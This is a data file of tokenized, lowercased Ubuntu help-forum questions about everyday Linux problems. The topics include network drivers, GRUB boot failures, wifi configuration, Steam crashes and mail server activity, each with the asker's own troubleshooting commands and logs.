394175	how to autostart programs ( chrome , libreoffice ) with a system , but in background as a service ?	i guess i can not do that with every program , but i expect that chrome and libreoffice can be `` preloded '' when system starts . how to do that ? i have checked in chrome settings google cloud print and ~ '' after close stay in background as a service '' . it does not apply since when i close chrome , there is none chrome-like process running in gnome-system-monitor . chrome has been installed from google website , not software center . edit : chromium installed via software center also do not start with a system or stay at background when closed nor as a process or a service .
394176	realtek rtl8111 wo n't connect at 1gbit	i 've been searching for a solution to this for a bit , but to no avail . my onboard lan wo n't connect at levels higher than 100mb/s . i 've tried a few different solutions , but nothing seems to work . here 's my lshw -c network . *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : 8c:89 : a5 : e7:4e:50 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.7 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:44 ioport : d000 ( size=256 ) memory : f7d04000-f7d04fff memory : f7d00000-f7d03fff *-network description : wireless interface physical id : 2 bus info : usb @ 2:1.5 logical name : wlan0 serial : 00:26 : f2:8c : fc:1b capabilities : ethernet physical wireless configuration : broadcast=yes driver=carl9170 driverversion=3.11.0-14-generic firmware=1.9.6 link=no multicast=yes wireless=ieee 802.11bgn i 'm running 13.10 desktop x64 . it 's mostly a fresh install , i 've been having this issue since install , just have n't gotten to it until now . my motherboard is msi z77ma-g45 i 've confirmed that other computers on the network are able to connect to the router through gigabit lan , as well as this computer when it was running windows . my router is an asus rt-n56u , it does have gigabit capabilities . my mb bios does n't actually have a setting to force the lan speed to 10/100 . any ideas ? any other information i can provide ? i 'm at a loss as to what information i can provide to get this solved . it is n't necessarily an important problem , but this pc does get used to stream media from time to time . the loss in bandwidth will hurt .
394177	ubuntu 13.10 installer on ssd boots to black screen with blinking underscore	what i have done : downloaded ubuntu-130.10-desktop-amd64.iso partitioned my ssd into a single partition with ext4 file system checked hashes - hash for the .iso is ok ran following command sudo cat ubuntu-13.10-desktop-amd64.iso > /dev/sdx tried to boot the ssd - this is when the black screen with blinking underscore comes . tried different sata port for the ssd - same problem . new ssd is # 1 in boot order i am partitioning and putting the installer in to ssd from another ubuntu instance on a different hard drive . any ideas what i am doing wrong ? what is the recommended way to put the .iso installation to the ssd ?
394185	ubuntu ppc 12.04 precise & ppc g4 quicksilver 1ghz dual installation	i am attempting to install ubuntu ppc 12.04 . i have tried most all of the options that appear to be related to what i am trying to do . unfortunately , i always loose my video signal after a too quick to read flash of text on a black background . what am i supposed to do for this installation ? is this a problem with my computer ? specifications : apple powerpc g4 quicksilver - dual 1ghz - 1 gb of ram
394188	how do i setup editors on linux ?	i downloaded text editors ( komodo , eclipse , sublime text , and medit ) . i opened the dash home but , they are in tar.gz format and are opening in archive managers as folders . how do i open them ? thank you .
394191	why did i get two home directories ?	fresh install of 13.10 , put `` swap '' and `` /home '' on 80g hdd and then `` / '' on a 32g ssd . everything works fine but when i examine the drives they both have a `` home '' directory with a `` mike '' ( that 's me ) sub directory . this seems like a rather silly thing for the ubuntu installer to do since i made a point of installing /home first , where i wanted it . my question now is , which is the real /home and how do i insure the `` mike '' files go only on the hdd as i intended ? should i delete the /home on the ssd ? edit : thank you responders . i see now that when i did search- > disks- > devices and looked at each drive i should have also checked `` properties '' and then i would have seen the /home folder on the ssd was twice the size of the ssd and therefore it must represent a link to the /home file on the hdd .
394193	is there a proven way to make skype work on ubuntu 13.10 ?	skype stopped working when i upgraded to ubuntu 13.10 on my 32-bit laptop . skype currently has no version for 13.10 . ubuntu 12.10 is the last version supported . does that mean no more skype with ubuntu ? i have tried ( to the best of my ability ) to follow various suggestions offered on this site and nothing has worked . in particular , i tried all of the suggested answers to the post entitled installing skype in ubuntu 13.10 . i have been able to reproduce the `` truck horn '' sound , but have never gotten proper sound . i have tried the questioner 's own workaround , but it did not work . i have tried both suggestions found at : http : //www.webupd8.org/2013/10/get-sound-working-in-skype-with-ubuntu.html but without the slightest success . back in good old ubuntu 12.10 , google earth and skype both worked . now neither works . is it too much to ask that canonical check that these two widely used programs will continue to work with each update before releasing it ?
394196	unable to boot windows after making the system dual boot with ubuntu 12.04 and windows 7	i tried to install ubuntu 12.04.3.windows 7 was preinstalled . when i was resizing the ntfs partition , an error ocurred , and windows 7 does n't boot anymore ! i have windows xp cd , runned chkdisc but it only boots the repair system and ca n't fix ! ! please help . urgent !
394199	removing ubuntu from uefi bios menu	i have a lenovo ideapad y510p . i recently removed ubuntu 12.04 from it , and did a reset on the windows 8 partition . however , i still have the ubuntu option in the firmware ( not bios ) boot menu , and i want to get rid of it . the problems are ( i looked this up ahead of time ) : in order to boot into the ubuntu usb i have , i need to be in legacy mode . in order to run sudo efibootmgr in ubuntu , i need to be in uefi mode . right now , when i run it , i get the could n't open either sysfs or procfs directories for accessing efi variables error ( i tried sudo modprobe efivars before it and after it and it looked like it did nothing ) . i ca n't be in both modes at once .
394200	how to connect raspberry pi into ubuntu ?	i just picked myself up a raspberry pi , i am trying to connect the pi to my computer via ethernet to access my video files . so far it seems to not notice any ethernet connection to my computer . i am using ubuntu 13.10 on my pc and using xbian to run xbmc on my pi , but i would be open to raspbmc , openelec or any others just looking for a solution .
394202	question about window managers	just wondering if there is a place i can find a list with screenshots of what window managers are available ?
394203	programs working under wine	i am having an issue of opening an .exe file with wine . for some windows programs wine works , for others it does not . i want to know the dependencies for wine . how can i check whether a particular .exe file will work perfectly with wine.thanks in advance !
394204	visual interface to a mac server	i am trying to connect to a mac server so that i have a visual interface as if it was a virtual desktop ... i think . i have the server information and access i.e i can ssh onto the server . any ideas on how i would do this ? thanks !
394205	preventing other packages from being upgraded from ppa	on gentoo linux : if i wish to upgrade my konsole progam which is available in an overlay named kde all i have to do it is to add the overlay to my system layman -a kde at this point i can install konsole by running emerge konsole but on the next system update : emerge -u world the package manager will also pull in newer versions of the kde apps i have installed on my system , since i added the kde overlay ( 'ppa ' ) . in order to prevent this from happening i simply have to first mask ( ie disable ) all packages from being installed from the kde overlay by placing : \*/\* : :kde in my /etc/portage/package.mask file the last step is to unmask back the konsole package which i wish to install from the kde overlay , by putting : kde-base/konsole : :kde in my /etc/portage/package.unmask how can i achieve the same thing in ubuntu ? e.g . adding the ppa ppa : kubuntu-ppa/backports & & apt-get update installing konsole : apt-get install konsole step 3 how do i prevent apt-get upgrade from upgrading my other kde packages from ppa : kubuntu-ppa/backports
394207	how to keep volume above 100 % in ubuntu 13.10	sometimes when watching a youtube video i need more volume . i go into `` sound settings '' and there 's an option to increase the volume to something like 150 % . problem is , when i bring the volume back down below 100 % , i ca n't increase it back above 100 % without going back into sound settings and changing it . my question is , is there any way to adjust the volume above 100 % without having to go into settings every time ?
394208	how to spread ubuntu 's message easily ?	a few years ago i was unaware of ubuntu and its motto . i could understand it from the video in 'examples ' . besides this video , is there any thing implemented for all users to get at least the meaning ?
394211	linux mint 15 ( ubuntu 13.04 ) spontaneously crashing : plz help me understand the syslog	i 'm running linux mint 15 , and my machine is spontaneously rebooting . it appears to happen when the computer is under load . normal use does n't seem to cause it , but i 'm trying to create a windows vm and i ca n't make it through the install , because the host keeps crashing . this is what my syslog looks like right before/after a crash . can anyone help me decipher this ? fyi cerebro is the hostname . dec 21 23:18:33 cerebro kernel : [ 6.294603 ] [ hardware error ] : mc4 error ( node 0 ) : protocol error ( link , l3 , probe filter ) . dec 21 23:18:33 cerebro kernel : [ 6.294606 ] [ hardware error ] : error status : system fatal error . dec 21 23:18:33 cerebro kernel : [ 6.294608 ] [ hardware error ] : cpu:0 ( 15:2:0 ) mc4_status [ over|ue|miscv|pcc|-|-|- ] : 0xfa000000000b0c0f dec 21 23:18:33 cerebro kernel : [ 6.294610 ] [ hardware error ] : cache level : l3/gen , mem/io : gen , mem-tx : gen , part-proc : obs ( no timeout ) dec 21 23:23:18 cerebro kernel : [ 301.422760 ] mce : [ hardware error ] : machine check events logged
394213	issue with touchpad on ubuntu 12.04	i 'm having a hard time on getting to work my laptop 's touchpad . the problem emerged after i installed the packages to make netflix works with ubuntu . i followed this tutorial at www.techtudo.com.br for the netflix installation , and it installed a bunch of packages , including wine , etc ( the tutorial is in portuguese , but can be translated easily through chrome ) . after that , my laptop 's touchpad stopped wornking . on my laptop 's keyboard , there 's a button that enables/disables the touchpad . what i realize is that , no matter how many times i push this button , it always returns to me a graphic notification showing that the touchpad is disabled . if i run this command : sudo modprobe -r psmouse & & sudo modprobe psmouse proto=imps the movement through the touchpad starts to working , but it still doesnt recover the toggle functionality of the touchpad blocking button on the keyboard . also , if i plug a usb mouse , the pointer movement works fine through the external mouse . any ideas on how to solve it ?
394216	getting wifi to work on surface pro 2	i followed the instructions in brandon clark 's answer to a question about dual booting ubuntu and windows 8 on a surface pro . i got ubuntu installed fine but ran into a snag getting the wifi to work . i double and triple checked my modifications to the interfaces and wpa_supplicant files , and they match his instructions . when i get to bit after the wpa_supplicant and restarting the computer i get many error culminating in '' mlan0 : cancelling authentication timeoutâ im using 13.10 on a surface pro 2 here is a printout of my terminal activity : ( i realize that i put the wpa_supplicant.conf in the wrong spot the first time around . this is the second time trying this from scratch and the first time i got it right off the bat and the same thing happened . ) tyler @ tyler-surface-pro-2 : ~ $ sudo service network-manager stop [ sudo ] password for tyler : network-manager stop/waiting tyler @ tyler-surface-pro-2 : ~ $ cd .. tyler @ tyler-surface-pro-2 : /home $ sudo gedit wpa_supplicant.conf ** ( gedit:2153 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found ( gedit:2153 ) : ibus-warning ** : the owner of /home/tyler/.config/ibus/bus is not root ! ( gedit:2153 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( gedit:2153 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( gedit:2153 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files tyler @ tyler-surface-pro-2 : /home $ sudo /sbin/wpa_supplicant -dd -imlan0 -c/etc/wpa_supplicant.conf -dwext , nl80211 wpa_supplicant v1.0 random : trying to read entropy from /dev/random initializing interface 'mlan0 ' conf '/etc/wpa_supplicant.conf ' driver 'wext , nl80211 ' ctrl_interface 'n/a ' bridge 'n/a' configuration file '/etc/wpa_supplicant.conf ' - > '/etc/wpa_supplicant.conf' reading configuration file '/etc/wpa_supplicant.conf' failed to read or parse configuration '/etc/wpa_supplicant.conf ' . failed to add interface mlan0 : cancelling scan request : cancelling authentication timeout tyler @ tyler-surface-pro-2 : /home $ cd .. tyler @ tyler-surface-pro-2 : / $ cd etc tyler @ tyler-surface-pro-2 : /etc $ sudo gedit wpa_supplicant.conf ** ( gedit:2314 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found ( gedit:2314 ) : ibus-warning ** : the owner of /home/tyler/.config/ibus/bus is not root ! ( gedit:2314 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( gedit:2314 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( gedit:2314 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files tyler @ tyler-surface-pro-2 : /etc $ sudo /sbin/wpa_supplicant -dd -imlan0 -c/etc/wpa_supplicant.conf -dwext , nl80211 wpa_supplicant v1.0 random : trying to read entropy from /dev/random initializing interface 'mlan0 ' conf '/etc/wpa_supplicant.conf ' driver 'wext , nl80211 ' ctrl_interface 'n/a ' bridge 'n/a' configuration file '/etc/wpa_supplicant.conf ' - > '/etc/wpa_supplicant.conf' reading configuration file '/etc/wpa_supplicant.conf' ctrl_interface_group='0' ctrl_interface='/var/run/wpa_supplicant' line : 3 - start of a new network block scan_ssid=1 ( 0x1 ) ssid - hexdump_ascii ( len=9 ) : 53 75 73 61 6e 31 37 37 36 susan1776 key_mgmt : 0x2 psk ( ascii passphrase ) - hexdump_ascii ( len=10 ) : [ removed ] psk ( from passphrase ) - hexdump ( len=32 ) : [ removed ] priority group 0 id=0 ssid='susan1776' rfkill : initial event : idx=0 type=2 op=0 soft=0 hard=0 could not read interface mlan0 flags : no such device wext : could not set interface 'mlan0 ' up mlan0 : failed to initialize driver interface - try next driver wrapper could not open file /sys/class/net/mlan0/phy80211/name : no such file or directory rfkill : initial event : idx=0 type=2 op=0 soft=0 hard=0 nl80211 : set mode ifindex 0 iftype 2 ( station ) nl80211 : failed to set interface 0 to mode 2 : -19 ( no such device ) nl80211 : try mode change after setting interface down could not read interface mlan0 flags : no such device nl80211 : interface mode change to 2 from 0 failed nl80211 : could not configure driver to use managed mode netlink : operstate : linkmode=0 , operstate=6 could not read interface mlan0 flags : no such device nl80211 : set mode ifindex 0 iftype 2 ( station ) nl80211 : failed to set interface 0 to mode 2 : -19 ( no such device ) nl80211 : try mode change after setting interface down could not read interface mlan0 flags : no such device nl80211 : interface mode change to 2 from 0 failed mlan0 : failed to initialize driver interface failed to add interface mlan0 mlan0 : cancelling scan request mlan0 : cancelling authentication timeout
394217	my eth0 has gone and i do n't have internet and network connection	i had internet connection , but when i upgraded my vga and restarted my pc then everything for eth0 has gone . when i used ifdown : ifdown : interface eth0 not configured is there something i could do ? edit : content of /etc/network/interfaces auto lo iface lo inet loopback when i ifconfig i do n't have these lines : inet addr:192.168.1.5 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :219:5bff : fe5e : a5e/64 scope : link in the terminal typed : sudo gedit /etc/network/interfaces and then added these lines in the bottom : auto eth0 iface eth0 inet dhcp then i typed : sudo ifdown eth0 sudo ifup eth0 when i send the second command i received the below message : no dhcpoffers received no working leases in persistent database - sleeping any help ?
394219	change default port for remote desktop sharing 12.04 lts	basically i want to be able to access different computers remotely ( all on ubuntu 12.04 lts ) that are on the same wireless network . i 've gotten this to work for one computer by forwarding port 5900 on my router , so i was thinking i could use forward port 5901 for my second computer . the problem is that i need to change the port that the second computer is listening on for remote desktop sharing ( change default 5900 to 5901 ) . any ideas on how to do this ? i am new to ubuntu btw . thanks .
394221	scan a file over the internet by its url using clamav	sometimes i have a need to scan the files over the internet given their urls . i did n't find any information about this capacity at the documentation of clamav . does it allow to do that ? how do i get the result of scanning ?
394224	why am i having to reinstall server on virtual box	i installed ubuntu 12.04 lts to oracle virtual box . after installation , i went on to create databases and unfortunately , my laptop shutdown . i was assuming since the os was installed , it would open but on restarting the machine , it started a fresh installation , and i am wondering why this is so .
394226	touchpad no longer working on my dell xps 13 ubuntu 12.04	i recently purchased a dell xps 13 with ubuntu 12.04 . after doing some recommended automatic upgrades , and restarting , the touchpad ( name= '' synps/2 synaptics touchpad '' ) is no longer working . i 'm a noob , but i have searched the web and this forum and seen a number of people running into this problem but have not found a solution to my problem . anyone have any ideas ?
394227	can not connect internet for static ip ( staticip )	i can not access the internet after set network interfaces to static ip for ubuntu server 12.x gui . how to fix this ? any one please help /etc/network/interfaces has the following settings : the loopback network interfaces auto lo iface lo inet loopback the primary network interfaces auto eth0 iface eth0 inet static address 192.168.1.2 netmask 255.255.255.0 gateway 192.168.1.1
394228	bash : colored copy / paste	as everybody , i have a few colorized output in my bash . i want to keep the colorized syntax when copying an extract to a html editor for example . is there a way to handle this ? thanks .
394233	resolution settings all missing after ubuntu updates	i have a dell xps13 with ubuntu 12.04 . after installing a bunch of updates that were automatically recommended , i am experiencing a number of issues . ( one of them was my touchpad no longer working -- although , i found a workaround for that . ) the other issue and a bigger concern for me is that i can not change the screen resolution . it is currently set to 1920x1080 , which is a strain on the eyes . when i try to change the settings , that is the only option i have . before the upgrades and reboot , i had a ton of other options . can someone please help a noob ? thanks ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1920 x 1080 , current 1920 x 1080 , maximum 1920 x 1080 default connected 1920x1080+0+0 0mm x 0mm 1920x1080 0.0* ~ $
394234	plex media pretty sure its a rookie mistake but you never know .	ok i see a ton of stuff for the plexmedia server . most of it hinges around permissions . i get get the server folder to show on the dlna display but i can not get the media through . i have check the permissions they are at 770 this is desktop edition version 13.1 am i just doing one of those rookie mistakes coming from windows . i love this system btw i just need to get use to it ask me what you need if this was a windows system i would pretty muck know what you need . i am trying to learn though . want to convert
394243	permanently delete .ds_store	i 'm running ubuntu 12.04 on a live usb . i ca n't permanently delete .ds_store : when i moved the file from another usb to trash it says no such file or directory . do i have to reformat my usb stick to permanently delete it or is there any other way ?
394244	stop ubuntu polling during suspension	problem is ubuntu is continually polling for devices during suspension . these polling 's take place on pcie devices my laptop does n't connect devices to possibly . they are on a cpu which could have them installed in the shop during customization . a peripheral device such as the video card ? i would like to enhance performance by reduce cpu use of polling while still having those necessary for multiple drives and plug-ins enabled during use . thanks in advance , dl
394245	booting from usb hdd , grub2 fails to load ( black screen ) and no grub rescue	i recently installed a fresh copy of ubuntu 13.10 onto a usb hard drive using unetbootin ( which used extlinux as the initial bootloader during install ) and have been having problems where grub2 is n't loading when the usb drive is selected from the bios boot menu . during boot , if the usb drive is selected from the bios boot menu , i am left with a black screen . the installation went well , and the system runs just fine , but i am unable to boot into it unless i use the grub2 from my debian installation that 's installed on my internal hard drive . i have tried numerous times to purge and reinstall grub2 , but have yet to be successful . i have tried both grub-install , grub-update ( thinking that maybe the menu entries were broken ) , apt-get to purge grub ( thinking that grub might be corrupt ) , as well as using dd to purge grub from my mbr entirely and then reinstalling it . the usb hard drive is formatted with a single primary ext4 partition and nothing else . any help would be greatly appreciated . thank you in advance , -ins0mniac
394247	slow login to the desktop and xsession errors	recently the time of login to the desktop from login screen has increased by 10 times . i tried to find out the reason and found that the following errors popup in the .xsession-errors file init : update-notifier-crash ( /var/crash/open-vm-tools-dkms.0.crash ) main process ( 2472 ) terminated with status 127 init : update-notifier-crash ( /var/crash/_usr_bin_gnome-panel.1000.crash ) main process ( 2476 ) terminated with status 127 init : update-notifier-crash ( /var/crash/_usr_bin_shutter.1000.crash ) main process ( 2477 ) terminated with status 127 init : update-notifier-crash ( /var/crash/_usr_lib_gnome-settings-daemon_gnome-settings-daemon.1000.crash ) main process ( 2479 ) terminated with status 127 init : update-notifier-crash ( /var/crash/_usr_lib_gnome-user-share_gnome-user-share.1000.crash ) main process ( 2481 ) terminated with status 127 init : update-notifier-crash ( /var/crash/_usr_lib_x86_64-linux-gnu_hud_hud-service.1000.crash ) main process ( 2482 ) terminated with status 127 init : update-notifier-crash ( /var/crash/_usr_lib_x86_64-linux-gnu_qt5_bin_qmlscene.1000.crash ) main process ( 2483 ) terminated with status 127 for starters , i do not have open-vm-tools installed . i have shutter , but it runs fine . i have no idea how to fix the rest of the errors .
394248	mount : permission denied	im currently trying to install ispconfig while runningsudo mount -o remount / it said permission denied heres what my fstab looks like proc /proc proc defaults 0 0 none /dev/pts devpts rw , gid=5 , mode=620 0 0 none /run/shm tmpfs defaults 0 0 /dev/sda1 / ext3 defaults , errors=remount-ro , noatime , usrquota , grpquota 0 1 thanks in advance
394249	i ca n't find the youtube browser plugin in totem 3.8.2 player	i 'm using ubuntu 13.10 at the moment , i can only play youtube videos through drag and drop a youtube link or 'open file location ' option there . when i press f9 or sidebar option , the playlist appears , but i ca n't customize it ( i want dropdown options to show with youtube in it ) . how can i do this ? do i need to download something ?
394251	clean install ubuntu 12.04 server 64bit , 100/100mbit net ( win pc net speed / win < - > ubuntu speeds are 100/100 ) , internet on ubuntuonly ~20/20mbit	tl ; dr : ubuntu box has low net speed ( ~2.7mb/s ) , other pc , running w8 achieves ~7mb/s . over lan those pcs achieve around ~9mb/s between each other . why is my ubuntu 12.04 64bit server internet speed low , when over lan it works fine ? nethogs shows nothing . i have freshly installed system on my `` second '' rig ( intel e4300 , 1.5gb ram , 100/100mbit realtek and 80gb hdd for now ) .. i am just getting the hang of linux and planning on having it used as a router and using it instead of my current old outdated router ( tplink ) . my internet connection speed is 100/100mbit . anyways , the problem is . my usual desktop ( quad core intel ) achieves ok speeds to the internet around 60/60mbit ( current router doesnt manage more atm ) . my ubuntu 12.04 64bit server achieves only 20mbit download , tested by downloading 1gb file from ftp . in windows it was through chrome , on ubuntu through cli wget* . however when i try to download/upload a file from the ubuntu to windows the speeds hover around 9-10mb/s . so there must be something limiting the internet speed on ubuntu . i also installed nethogs as was recommened by someone when i googled for the cause of the problem , but it has shown nothing using the internet connection . cpu isnt used at all ( gets to maybe ~30 % copying over lan at 9mb/s ) ram isnt taken either , around 20 % used ethtool gives this info speed : 100mb/s duplex : full ping is ~11.4 to 8.8.8.8 / no packet loss tried disabling ipv6 , like adviced here thank you for you time and help . i tested only one machine at a time and with about 30sec in between , so i doubt it was third party fault . i let it download about 500mb both times . on windows machine the avg . speed was around ~7mb/s , on ubuntu ~2.6mb/s .
394252	where does apt-get install get packages from ?	when i install something in the terminal , such as chromium , i would type in sudo apt-get install chromium-browser how does the terminal know that chromium-browser is a valid package to install ? is there some list of all packages that can be installed ? how does it find the packages ?
394253	installing steam on ubuntu 1	how do i use steam on ubuntu ? i have the icon on the desktop but when i click it , it shows this window `` package install '' and then asks for a password but then does n't let me type in anything . then when i close the window it reports the following error : you are missing the following 32-bit libraries , and steam may not run : libc.so.6 some help would really be appreciated because i 'm going crazy over here !
394254	ubuntu server sending mail from www-data	i am running a server with ubuntu 12.04 and three wordpress installations , some ftp server and a basic postfix to send mails with wordpress . additionally i am using webmin to administrate this system . now i checked my munin side and saw some major postfix activity . the queue entries look like this : -queue id- -- size -- -- -- arrival time -- -- -sender/recipient -- -- -- - af9ac11a03d9 2489 sun dec 22 04:29:26 www-data @ digital-geography.com ( host alt1.gmail-smtp-in.l.google.com [ 173.194.79.26 ] said : 450-4.2.1 the user you are trying to contact is receiving mail at a rate that 450-4.2.1 prevents additional messages from being delivered . please resend your 450-4.2.1 message at a later time . if the user is able to receive mail at that 450-4.2.1 time , your message will be delivered . for more information , please 450 4.2.1 visit http : //support.google.com/mail/bin/answer.py ? answer=6592 pi8si9408127pac.88 - gsmtp ( in reply to rcpt to command ) ) facilitydkxh+jofbce @ gmail.com passwd files were changed only by myself , no suspoicious logins . we do have ssh with passwords enabled . i think my system is compromised but i would like to know who is the troublemaker : wordpress , postfix , or the system itself ? to me it looks like wordpress and some hard mail-function in the php of wordpress .
394257	brother dcp-j315w ink problem	why the printer show the black ink is empty even though when i check manually , the black ink is still 35 % full ? it 's really frustrated that i always need to change the new ink even thought it 's still not finish being use finiah .
394260	copying from mounted usb to mounted nas : permission denied	i have two mounting points in /etc/fstab and they look like this : # nas mount //192.168.1.2/ [ mountdir ] /mnt/ [ mountdir ] cifs credentials=/home/xxxx/.smbcredentials , rw , uid=1000 , gid=1000 , file_mode=0777 , dir_mode=0777 , domain=xxxx , iocharset=utf8 uuid=c2ecf26eecf25bdb /media/xxxx/expansiondrive ntfs-3g user , uid=1000 , gid=1000 , dmask=027 , fmask=137 0 0 i want to copy files from the usb drive to the network share but also include the directories . everytime i try to do this i get the error unable to create directory . permission denied . what i want to do is use rsync to copy the files . with rsync i get the following message : rsync : recv_generator : mkdir `` /mnt/ [ mountpoint ] /dir '' failed : no such file or directory ( 2 ) when i copy files in the directory manually , it works . it is just unable to create directories . if i copy a folder from my home directory it works . it is able to create the directory and copy the contets . what am i doing wrong ? i believe it is a permission issue on the usb drive side , but i have no idea what it could be . ok , so i figured it out . the name in the directory contained a colon ( : ) which is an unsupported character in rsync . for a workaround see this post .
394265	how to remove postgres 9.3 and install 9.2	i want to install postgres 9.2 and remove 9.3 on ubuntu 13.04 , since i want to install a software and they recommand postgress 9.2 , thank you
394268	grub wo n't boot after ubuntu disk dies	i have a system with two internal drives . the master drive is win7 , and i installed ubuntu on a partition on the other drive for test purposes . i modified the bootloader sequence to put the win7 disk at the top . all good . the disk that contained ubuntu is now toast . it is not recoverable . since there is only ubuntu on it , i do n't really care , and the disk is in the trash . however , the astuste reader will now know that i can not boot at all , because grub can no longer see the disk that has ubuntu on it . i get the `` grub rescue '' prompt . what to do ? ( please do not tell me to boot ubuntu from a cd or a flash disk or the inoperable old disk since none of these options are immediately available to me . i have no idea what the linux names of the disks are either )
394269	how to sign log files ?	rsyslogd is default daemon for providing log files in ubuntu . the possibility to sign log messages through guardtime , a signature provider , introduced with rsyslog . but there is no manual for do it ! please help me to learn it ...
394270	ubuntu 12.04 wifi missing in nm	i 'm a newbie on ubuntu and i need some help . i recently got a ubuntu 12.04 running laptop , first time i connected to wireless it went flawlessly , but after i turned it of and started it again wireless networks wo n't show in network manager and i ca n't connect to it . i tried some of the similar problems solutions but nothing helped , such as sudo apt-get install network-manager , but it says that nothing is updated ( 0 upgraded , 0 newly installed , 0 remove and 0 not upgraded ) . rfkill list 1 : hci0 : bluetooth soft blocked : no hard blocked : no this is what i get when i enter rfkill list . im not sure what o/p is . and this is the result of sudo apt-get install nework-manager : sudo apt-get install nework-manager reading package lists ... done building dependency tree reading state information ... done network-manager is already the newest version . the following packages were automatically installed and are no longer required : mingw-w64 sbsigntool gir1.2-timezonemap-1.0 realpath efibootmgr diffstat libdmraid1.0.0.rc16 libdebconfclient0 binutils-mingw-w64-i686 kpartx-boot libopts25 gir1.2-json-1.0 quilt autogen gcc-mingw-w64 user-setup gcc-mingw-w64-i686 kpartx rdate binutils-mingw-w64-x86-64 libdebian-installer4 libopts25-dev btrfs-tools apt-clone localechooser-data gcc-mingw-w64-base gcc-mingw-w64-x86-64 archdetect-deb dmraid python-pyicu libkms1 mingw-w64-dev gir1.2-xkl-1.0 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
394272	how can i disable auto boot in ubuntu 12.04 on laptop ?	i 'd like to be able to leave ubuntu 12.04 running on my laptop for an extended time period . but it reboots after a while . how can i prevent that ?
394273	xampp in ubuntu	i am a newbie to ubuntu and xampp ( xampp-linux ) . i installed ubuntu first and apache , mysql and php with that . then i installed xampp . i am able to get to /home/username/directory1 . then i am able to see an index.html file in directory1 and a test.php file in directory1 . however , i changed httpd.conf to take it to /home/username/directory2 ( in directory 2 i have test.php ) . i am able to see phpinfo ( ) page , which states that i am using directory1 . please help me understand it . at the moment i get this blindly . also i am unable to get to xampp using localhost/xampp . could this be duplication due to installing ubuntu + apache , mysql and php first ?
394274	in a web called `` yes we play '' i can not write @ sign	i want to sign in in https : //www.yesweplay.com/ but when i press `` alt gr '' in spanish keyboard to make the @ , the web seems to change to a stand by status an can not write @ . i tried it in the sign in of hotmail and no problem , so why it works in some webs and not in others . is it a problem of ubuntu 12.4 ?
394276	another steam launching problem in ubuntu	after i installed the steam via software center , it wo n't start at all , just flashed and closed itself . my video driver is nvidia . tom @ tom-desktop : ~/downloads $ steam running steam on ubuntu 13.10 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) unlinked 0 orphaned pipes removing stale semaphore last operated on by process 8328 with name 0eblobregistrymutex_72fcb912524c8721ae2a110432921374 removing stale semaphore last operated on by process 8328 with name 0eblobregistrysignal_72fcb912524c8721ae2a110432921374 removing stale semaphore last operated on by process 8328 with name 0emsteamengineinstance removing stale semaphore last operated on by process 8328 with name 0esteamenginelock gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig error : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 70 : non-double matrix element fontconfig warning : `` /etc/fonts/conf.d/10-scale-bitmap-fonts.conf '' , line 78 : saw unknown , expected number [ 1222/192029 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) installing breakpad exception handler for appid ( steam ) /version ( 1386799584_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20131222192028_1.dmp /home/tom/.local/share/steam/steam.sh : line 755 : 8491 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-ef1194b1-cded-4ffc-8257-d2ebf2131222
